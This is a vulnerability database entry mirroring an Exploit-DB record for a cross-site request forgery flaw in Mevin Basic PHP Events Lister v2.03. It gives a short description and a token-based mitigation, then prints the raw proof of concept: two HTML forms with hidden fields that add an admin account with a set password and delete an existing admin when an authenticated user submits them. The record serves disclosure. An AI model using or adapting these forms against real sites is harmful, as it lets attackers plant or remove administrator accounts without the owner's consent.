Mevin Basic PHP Events Lister v2.03

vendor:

Basic PHP Events Lister

by:

Crazy_Hacker

7.5

CVSS

HIGH

CSRF Vulnerability [Add & Delete Admin]

352

CWE

Product Name: Basic PHP Events Lister

Affected Version From: 02.03

Affected Version To: 02.03

Patch Exists: N/A

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

N/A

Mevin Basic PHP Events Lister v2.03

A CSRF vulnerability exists in Mevin Basic PHP Events Lister v2.03, which allows an attacker to add and delete admin users. An attacker can craft a malicious HTML page containing a form with hidden fields that when visited by an authenticated user, will add or delete an admin user.

Mitigation:

The application should use a random token in the form that is checked against the server-side session. The token should be unpredictable and should be changed after each request.

Source

Exploit-DB raw data:

#######################################################
#	Author:			Crazy_Hacker
#	Script:			Mevin Basic PHP Events Lister v2.03
#	Exploit type: 	CSRF Vulnerability [Add & Delete Admin]
#	Download:		http://www.mevin.com/downloads/Basic-php-events-lister2.03.zip
# 	Risk: 			High
#	Contact:		jy8@hotmail.com
#######################################################


<form name="setup" action="http://127.0.0.1/events2/admin/user_add.php" method="post">
<input name="uname" type="hidden" value="Crazy_Hacker" />
<input name="pword" type="hidden" value="PWNED!!" /> 
<input type=submit name=submit value="Add Admin">
</form>
<form action="http://localhost/events2/admin/user_delete.php?id=8" method="post">
<input type="hidden" name="ud_id" value="8">
<input type="submit" name="submit" value="Delete Admin">
</form>

				\\// S3crity just Suck5 \\//
				
#EOF